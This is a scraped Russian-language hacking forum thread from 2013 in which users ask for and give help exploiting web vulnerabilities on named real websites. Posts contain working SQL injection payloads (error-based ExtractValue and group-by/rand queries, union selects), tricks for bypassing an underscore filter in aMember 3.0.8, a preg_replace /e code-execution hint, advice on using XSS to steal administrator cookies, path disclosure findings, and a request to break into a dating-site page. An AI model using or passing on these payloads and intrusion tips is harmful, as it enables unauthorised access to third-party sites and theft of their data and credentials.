Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    :eek: Какой ахтунг. А кто будет указывать в функции модификатор?
    Like this - preg_replace("//e", "payload", NULL);
     
  2. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    Есть слепая скуля и запрос вида 1'or(ExtractValue(1,concat(0x3a,(select(concat(table_schema,'.',table_name))from(information_schema.tables)where`table_name`like(0x25757365727325)and(data_length>0)))))='

    ответ выдает ошибку syntax to use near ';0)))))='1'

    скуля не выполняется полностью из-за знака ">" в запросе, т.к. меняется на > и обваливается

    Вопрос: как правильно оформить или вернее можно ли поменять знак ">" ?
     
    #22062 Sanic1977, 7 Apr 2013
    Last edited: 7 Apr 2013
  3. BlackIce

    BlackIce Elder - Старейшина

    Joined:
    10 Jan 2013
    Messages:
    100
    Likes Received:
    31
    Reputations:
    27
    попробуй вместо > подставить !=
     
  4. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    да об этом знаю. работает только ответ Subquery returns more than 1 row
    а как сделать на интервале 0..10 или
    like(0x25757365727325)and( data_length>0)and( data_length<10)

    или как узнать таблицы, в этом случае?
     
    #22064 Sanic1977, 7 Apr 2013
    Last edited: 7 Apr 2013
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    data_length not in (0)

    data_length between (0) and (10)
     
    _________________________
    1 person likes this.
  6. Sanic1977

    Sanic1977 Banned

    Joined:
    29 Oct 2008
    Messages:
    98
    Likes Received:
    6
    Reputations:
    0
    такая конструкция не работает
    выдает syntax to use near 'between((0)and(10))))))='1
     
  7. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    between(0)and(10)))))='1
     
    _________________________
  8. m1d$

    m1d$ New Member

    Joined:
    30 Mar 2013
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    как можно раскрутить highlight.php ??
    например http://www.itwire .com/plugins/system/highlight/highlight.php
    Уязвимость > http://1337day.com/exploit/description/20447
    Хотя-бы намёк дайте,пожалуйста.
     
  9. Улыбайся

    Joined:
    23 Oct 2011
    Messages:
    71
    Likes Received:
    7
    Reputations:
    3
    http://animemagazine.info/index.php?productID=1+order+by+4+--+

    http://animemagazine.info/index.php?productID=-1+union+select+1,2,3,4+--+

    Тело письма говорит
    <input type=hidden name=productID value="-45 union select 1,2,3,4 -- ">

    Как вывести принтабельные поля?
     
    #22069 Улыбайся, 11 Apr 2013
    Last edited: 11 Apr 2013
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    PHP:
    http://animemagazine.info/index.php?productID=1%27+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
     
  11. Xazarychi

    Xazarychi New Member

    Joined:
    14 Sep 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Помогите новичку, пожалуйста. Что обычно делают с Xss уязвимостями, после того как обнаружил их?
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    по идее дописуют жс код, подкидуют ссылку на уязвимость админу чтобы своровать куки(не спрашивай как, а просто ЗАЙДИ В ГУГЛ И ПОСМОТРИ, ТАМ СТАТЕЙ НА ЭТУ ТЕМУ МИЛИОНЫ), но в 99 процентов случаях просто забивают и ничего не делают, потому что, то админки нету, то связатся с админом невозможно, и вобще это такой гемор который в 90% случаев того не стоит.
     
  13. giperbola

    giperbola New Member

    Joined:
    10 Mar 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Можно ли и как возломать НЕпосещаемую страницу на сайте знакомств Loveplanet?
     
  14. goot

    goot New Member

    Joined:
    25 Mar 2013
    Messages:
    2
    Likes Received:
    1
    Reputations:
    5
    Всем привет!
    Подскажите можно из этого что нить извлечь
    PHP:
    http://mlw-cardon.ru/check?domain=1'
    Havij v1.16 - не может подцепиться
    А сам новичке не могу все время тот же результат
     
  15. \/IRUS

    \/IRUS Elder - Старейшина

    Joined:
    3 Aug 2012
    Messages:
    379
    Likes Received:
    498
    Reputations:
    37
    как минимум это раскрытие путей /home/users2/w/waf/domains/mlw-cardon.ru/
    удаленный инклуд не просматривается, хотя и очевиден =(
    но есть скуля-буля там )) пиши мне в ПМ если хочешь узнать больше
     
  16. goot

    goot New Member

    Joined:
    25 Mar 2013
    Messages:
    2
    Likes Received:
    1
    Reputations:
    5

    Спасибо это было очевидно!
    Но от помощи раскрыть sql не откажусь
     
  17. SaliVan

    SaliVan New Member

    Joined:
    22 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    фильтр таблицы

    привет всем !
    нужна помощь в обходе фильтра на знак '_'

    уязвимый код
    PHP:
     list($y$m) = split('_'$_GET['year_month']);
     
    $m sprintf('%02d'$m);
     
    $dat1 "{$y}-{$m}-01"
     
    $dat2 date('Y-m-t'strtotime($dat1));
    ...........
    $q $db->query("SELECT DAYOFMONTH(ac.date), COUNT(commission_id),
            SUM(IF(record_type='debit', amount, 0)), 
            SUM(IF(record_type='credit', amount, 0)),
            SUM(IF(record_type='debit', 1, 0))
            FROM 
    {$db->config[prefix]}aff_commission ac
            WHERE aff_id=
    $member_id AND ac.date BETWEEN '$dat1' AND '$dat2'
            GROUP BY DAYOFMONTH(ac.date)
        "
    );
    ...........
    запрос который у меня вышел
    можно ли каким то образом обойти такой фильтр???

    зашифровать?
    чтото типа
    Code:
    SELECT * FROM (SELECT 0x7461626c655f6e616d65) AS t2
    да и к стати это уязвимость в aMember 3.0.8 PRO в фаиле aff.php
     
    #22077 SaliVan, 12 Apr 2013
    Last edited: 12 Apr 2013
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    select login from member_admins

    select login from member%5fadmins

    select login from member%255fadmins
     
    _________________________
  19. smail111

    smail111 New Member

    Joined:
    11 Apr 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    SQLMAP
    SQL-иньекция определила, что dbms - Microsoft Access! Но имя ее не может вытащить! Если пытаться посмотреть список таблиц то у всех название _fil! Кто сталкивался с такой проблемой? НУЖНА ПОМОЩЬ! Скрины прилагаются
    [​IMG]
    [​IMG]
    [​IMG]
     
  20. SaliVan

    SaliVan New Member

    Joined:
    22 Apr 2012
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    тут это не поможет так %5f при обработке превращается в '_' и
    PHP:
    list($y$m) = split('_'$vars['year_month']);
    его рубит

    надо ка кто выполнить запрос вообще без этого знака
     
Thread Status:
Not open for further replies.